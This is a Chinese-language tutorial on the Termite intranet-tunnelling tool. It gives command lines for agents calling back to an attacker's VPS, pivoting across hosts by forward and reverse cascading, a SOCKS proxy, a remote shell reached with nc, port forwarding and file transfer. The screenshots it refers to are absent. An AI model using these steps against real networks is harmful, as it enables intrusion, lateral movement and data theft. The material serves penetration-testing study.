【代理篇】内网穿透利器——Termite

0x01 概述

1、工具介绍

Termite是一款内网穿透利器，分为管理端admin和代理端agent。它支持多平台、跳板机间正反向级联、内置shell管理等。

Admin功能参数

 

Agent功能参数

 

 Admin连接agent后的功能参数

 

 

另附官方使用说明：http://rootkiter.com/Termite/README.txt

 

0x02 不同场景中的使用

1、目标在公网

 

使用：

（1）目标A：agent_win32.exe -l 8888

（2）PC：admin_win32.exe -c 目标ip -p 8888

效果：

 

2、目标在内网（能出网）

 

使用：

（1）在vps运行：agent_win32.exe -l 8888

（2）在自己机器运行：admin_win32.exe -c vps_ip -p 8888

（3）在目标机器运行：agent_win32.exe -c vps_ip -p 8888

效果：

 

3、目标B在内网（不出网，通出网机器A）

 

（1）agent间正向连接

使用：

a.在vps运行：agent_win32.exe -l 8888

b.在PC运行：admin_win32.exe -c vps_ip -p 8888

c.在出网机器A运行：agent_win32.exe -c vps_ip -p 8888

d.在目标B运行：agent_win32.exe -l 9000

e.在PC运行：goto A_id → connect B_ip 9000

效果：

 

（2）agent间反向连接

说明：

a.在vps运行：agent_win32.exe -l 8888

b.在PC运行：admin_win32.exe -c vps_ip -p 8888

c.在出网机器A运行：agent_win32.exe -c vps_ip -p 8888

d.在PC运行：goto A_id -> listen 9000

e.在目标B运行：agent_win32.exe -c A_ip -p 9000

效果：

 

0x03 常用功能

1、socks代理

使用：

（1）goto 对应id
（2）socks 1080

效果：

 

  

 2、shell管理

使用：

（1）shell 4444
（2）nc -v 127.0.0.1 4444

效果：

 

3、端口转发

使用：

lcxtran 本地端口 目标ip 目标端口

效果：

 

4、上传下载文件

使用：

upfile 本地文件路径 目标路径

downfile 目标文件路径 本地存放路径

效果：